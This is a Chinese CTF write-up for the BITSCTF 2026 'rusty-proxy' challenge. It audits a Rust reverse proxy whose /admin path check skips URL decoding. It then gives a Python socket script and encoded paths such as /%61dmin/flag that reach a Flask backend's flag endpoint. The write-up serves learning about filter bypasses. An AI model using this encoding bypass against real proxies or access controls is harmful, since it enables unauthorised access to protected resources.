恒美微站 Logo 恒美微站
  • 首页
  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心
  • 联系我们

【CTF-WEB-代码审计】URL编码绕过路经检查访问flag页面,admin编码为%61%64min

  • 首页
  • 资讯中心
  • /
  • 【CTF-WEB-代码审计】URL编码绕过路经检查访问flag页面,admin编码为%61%64min

相关资讯

TI HTU模块安全机制与双缓冲配置实战解析 2026/8/2 18:56:54
ICM创芯微 CM1003-BJS SOT23-6 BMS电池保护芯片 2026/8/2 18:56:55
HarmonyOS应用实战-启示散页-23-页面回到前台还是旧题库:分清 Ability 生命周期和页面刷新 owner 2026/8/2 18:56:56

最新资讯

CANN/ge注册回调函数API
CANN/ge PatternFusionPass构造函数
CANN/ge 从内存加载序列化图API
Ubuntu 22.04安装Docker全攻略:从环境检查到高频排错
AI算力瓶颈转向光互连,玻璃纤维如何解放硅基大脑
WorkBuddy容器版架构解析:桌面Agent+轻量容器运行时的智能体执行框架

今日推荐

AI搜索重构内容生态:企业从“流量争夺”转向“答案共建”
AI搜索的信任缺口:企业内容如何在答案时代自证可信
Spring Boot+Vue+Node.js售后服务系统开发实战

本周热门

超人会飞不算本事:系统稳定依赖清晰规则与边界设计
超人VS蜘蛛侠:拆解超级IP的影响力与传播方法论
基于CNN的调制信号识别:MATLAB实现时频图分类实战

本月精选

自研推理加速器Redwood:两周内实现PyTorch模型高效部署的实战教程
V4L2摄像头采集实战:从camera_client.rar到出图全流程解析
从“谁发明了钢琴键”到知识问答智能体:RAG与记忆工程实践

【CTF-WEB-代码审计】URL编码绕过路经检查访问flag页面,admin编码为%61%64min

发布时间:2026/9/10 4:07:15
【CTF-WEB-代码审计】URL编码绕过路经检查访问flag页面,admin编码为%61%64min 题目BITSCTF 2026\题目\WEB\rusty-proxyrusty-proxyI just vibecoded a highly secure reverse proxy using rust, I hope it works properly.http://chals.bitskrieg.in:25001解题思路访问网站http://chals.bitskrieg.in:25001http://chals.bitskrieg.in:25001/api/status问题分析题目要求我们分析一个用Rust编写的反向代理服务器rusty-proxy并找到其中的安全漏洞从而获取后端服务器的flag。提供的代码结构如下proxy/src/main.rsRust编写的反向代理服务器代码backend/server.pyPython编写的后端服务器代码docker-compose.ymlDocker Compose配置文件代码审计1. 后端服务器分析首先查看后端服务器的代码backend/server.pyfromflaskimportFlask,jsonify,requestimportcheroot.wsgiimportos appFlask(__name__)FLAGos.getenv(FLAG,BITSCTF{fake_flag})app.route(/,methods[GET,POST])defindex():ifrequest.methodPOST:_request.get_data()returnjsonify({version:1.0.0,endpoints:[/,/api/status],})app.route(/api/status)defstatus():returnjsonify({status:running,uptime:operational,})app.route(/admin/flag)defvault():returnjsonify({flag:FLAG})if__name____main__:bind_addr(0.0.0.0,8080)servercheroot.wsgi.Server(bind_addr,app)print(fBackend running on{bind_addr[0]}:{bind_addr[1]})try:server.start()exceptKeyboardInterrupt:server.stop()从后端代码可以看出后端是一个Flask应用运行在8080端口提供了三个端点/返回版本信息和可用端点/api/status返回服务器状态/admin/flag返回flag这是我们的目标直接访问/admin/flag无法获取到flag2. 反向代理服务器分析接下来查看反向代理服务器的代码proxy/src/main.rs2.1 路径检查函数fnis_path_allowed(path:str)-bool{letnormalizedpath.to_lowercase();ifnormalized.starts_with(/admin){returnfalse;}true}这个函数负责检查请求路径是否允许访问。它将路径转换为小写然后检查是否以/admin开头如果是则返回false拒绝访问。2.2 请求解析函数asyncfnparse_request(reader:mutBufReadertokio::io::ReadHalfTcpStream,)-ResultOptionRequestMeta,staticstr{// ... 解析请求行 ...lettrimmed_linerequest_line.trim_end().to_string();letparts:Vecstrtrimmed_line.splitn(3, ).collect();ifparts.len()!3{returnErr(malformed request-line);}letmethodparts[0].to_string();letpathparts[1].to_string();letversionparts[2].to_string();// ... 解析请求头 ...Ok(Some(RequestMeta{method,path,version,headers,is_chunked,content_length,client_wants_close,}))}这个函数负责解析HTTP请求从请求行中提取方法、路径和版本。注意它直接将路径存储到RequestMeta结构中没有进行任何URL解码。2.3 客户端处理函数asyncfnhandle_client(client:TcpStream,pool:ArcConnPool){let(read_half,mutwrite_half)tokio::io::split(client);letmutreaderBufReader::new(read_half);loop{letmetamatchparse_request(mutreader).await{Ok(Some(m))m,Ok(None)break,Err(msg){let_send_error(mutwrite_half,400 Bad Request,msg).await;break;}};letclose_aftermeta.client_wants_close;if!is_path_allowed(meta.path){let_send_error(mutwrite_half,403 Forbidden,Access denied.\n).await;break;}// ... 连接后端服务器 ...letmutheadformat!({} {} {}\r\n,meta.method,meta.path,meta.version);for(k,v)inmeta.headers{head.push_str(format!({}: {}\r\n,k,v));}head.push_str(\r\n);// ... 发送请求到后端服务器 ...}}这个函数负责处理客户端请求解析HTTP请求获取请求元数据调用is_path_allowed函数检查路径是否允许访问如果允许访问将原始路径传递给后端服务器漏洞发现在分析代码后我发现了一个潜在的安全漏洞is_path_allowed函数没有对路径进行URL解码。这意味着如果路径是URL编码的比如/%61dmin/flag那么path.to_lowercase()会将其转换为/%61dmin/flag因为URL编码的部分是大写的然后检查是否以/admin开头这显然不会匹配所以会返回true允许访问代理服务器会将原始的URL编码路径传递给后端服务器后端服务器Flask应用会自动对URL进行解码将其解码为/admin/flag然后返回flag漏洞利用测试1使用URL编码的路径代码访问importsocket# 创建socket连接socksocket.socket(socket.AF_INET,socket.SOCK_STREAM)sock.settimeout(5)sock.connect((chals.bitskrieg.in,25001))# 构建HTTP请求使用URL编码的路径# %61 是字符 a 的URL编码requestbGET /%61dmin/flag HTTP/1.1\r\nrequestbHost: chals.bitskrieg.in:25001\r\nrequestbConnection: close\r\nrequestb\r\n# 发送请求sock.sendall(request)# 接收响应responsebwhileTrue:try:datasock.recv(1024)ifnotdata:breakresponsedataexceptsocket.timeout:break# 关闭连接sock.close()print(response.decode())测试结果HTTP/1.1 200 OK Content-Type: application/json Content-Length: 55 Date: Sun, 22 Feb 2026 07:08:01 GMT Server: Cheroot/11.1.2 {flag:BITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}}成功获取到了flag直接访问http://chals.bitskrieg.in:25001/%61dmin/flag其他测试我还测试了其他几种URL编码方式都成功绕过了路径检查/%61%64min/flag只编码前两个字符/%61%64%6d%69%6e/flag编码整个admin字符串所有测试都成功获取到了flag。漏洞原理输入处理不当is_path_allowed函数没有对输入路径进行URL解码直接使用原始路径进行检查。信任用户输入函数信任用户提供的路径没有进行任何验证或转换。后端自动解码后端服务器Flask应用会自动对URL进行解码使得编码后的路径能够被正确解析。总结通过代码审计我发现了一个URL编码绕过漏洞利用这个漏洞成功获取了后端服务器的flag。这个漏洞的根本原因是is_path_allowed函数没有对路径进行URL解码导致攻击者可以通过发送URL编码的路径来绕过路径检查。最终flagBITSCTF{tr4il3r_p4r51n6_15_p41n_1n_7h3_4hh}

关于恒美微站

恒美微站专注于为个体商户、工作室提供极简自助建站服务,让每个人都能轻松拥有专业网站。

快速链接

  • 关于我们
  • 建站服务
  • 主题模板
  • 案例展示
  • 资讯中心

服务项目

  • 可视化建站
  • 拖拽编辑
  • 主题定制
  • SEO 优化
  • 网站托管

联系方式

  • 📍 地址:北京市朝阳区建国路 88 号
  • 📞 电话:400-888-8888
  • ✉️ 邮箱:info@hmyw.cn
  • 🕐 时间:周一至周日 9:00-18:00

© 2024 恒美微站 hmyw.cn 版权所有 | 京 ICP 备 12345678 号